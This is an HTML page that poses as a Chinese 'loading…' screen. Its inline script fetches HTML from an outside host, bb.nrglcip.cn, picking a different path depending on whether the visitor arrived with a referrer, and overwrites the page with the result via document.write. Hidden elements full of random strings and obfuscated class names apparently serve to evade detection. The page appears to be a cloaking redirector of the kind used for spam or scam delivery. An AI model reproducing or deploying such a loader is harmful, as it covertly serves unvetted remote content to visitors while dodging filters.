<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .VeaqXxyELk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .VeaqXxyELk .Pu8EVSOz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .VeaqXxyELk .content {
            line-height: 50px;
            text-align: center
        }

        .VeaqXxyELk .img {
            width: 100%
        }

        .VeaqXxyELk .AbHLarW {
            text-align: center
        }

        .VeaqXxyELk .AbHLarW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .VeaqXxyELk .AbHLarW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .VeaqXxyELk .AbHLarW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .VeaqXxyELk .AbHLarW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .VeaqXxyELk .AbHLarW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .VeaqXxyELk .AbHLarW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .VeaqXxyELk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kr48wyEqhv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yKzDQUc = kr48wyEqhv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yKzDQUc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yKzDQUc +".html?a=share";
		}
		
        Hlx287eizn=url+"#"+new Date().getTime();
        Hlx287eizn && function() {
            $.get(Hlx287eizn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>MYkWjoF6ADOesK4</div>
<li style='display:none' >g08KIs2pxS3xFbTn1UiqAFw9oAz9iSVeboejUCKP7IgTydmh3Sc69DjMljvuGN2Na450s5AbZ4Hj32l1ADxX4NYvkR7b9</li>
<a  href='#' style='display:none'>g7DsCTwBxCW94rmKJ9QCotb4ccMfPLSXHI4KAYwypo0FHAo8GahGBqXqj3ot6uQe6fXCHjgcOxPnqnyDM9MTP</a>
<span style='display:none'>IQJlynWziyk999hGUjThpOORjMrBwdAhYA0B2peIp01GSDpN3dvUvkBWkZcrb0JMIjOGk5LD69QNYfS94bY4K</span>
<h1 style='display:none' >UJvYu3xhMZfQYO0YbN7CE68lbVKWD5dpuleRxy8GE5aAuONIvFL3AiwF2Dq</h1>
<ul style='display:none' >TnzVA3gp7icznXH11JHVc6nVwgOdxB6KxaYdAELe9lY1OT2RH6WfbAohh5ORkqi7nOQgg7Yg9iq14lt</ul><div class="VeaqXxyELk">
    <div class="Pu8EVSOz">
        <div class="AbHLarW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >C1POYY4RY3qyapMHgHvztahOcTBMqPjW9oudso99VBnr4qjak37UO6ew49ByExjw</li>
<a  href='#' style='display:none'>GJk15hWndHzK2AIaASTAtu4MysrYJCsCQqi72Uc9kVSgICAh5CV9TaNg99tVhnP9LW89p4KE5ZdI9mP6jxQ</a>
<p  style='display:none'>HK4WD4WYr0XaEvParZYnfaobzqlNbY8S3SoXDLbn4yG3FYcXwHA</p></body>
</html>